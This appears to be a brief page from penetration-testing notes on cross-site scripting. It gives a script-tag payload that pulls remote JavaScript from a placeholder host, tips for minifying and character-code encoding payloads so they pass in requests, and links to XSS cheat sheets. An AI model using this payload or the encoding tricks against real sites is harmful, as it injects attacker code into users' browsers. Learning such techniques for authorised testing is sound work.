search

XSS - Cross site scripting

hashtag
Remote JavaScript include

<script src="http://domain.com/remote.js"></script>

Depending on the context and length of the payload, it can sometimes be minified, encoded and submitted directly in the request.

Minifier tool: https://javascript-minifier.com/arrow-up-right

Character code encoding:https://eve.gd/2007/05/23/string-fromcharcode-encoder/arrow-up-right

Great resources:

LogoCross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademychevron-right

[Payloadsallthethings XSS Cheatsheet]("https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSSarrow-up-right Injection" "Payloads all the things XSS cheatsheet")

PreviousWeb application testingNextWeaponising XSS

Last updated

Was this helpful?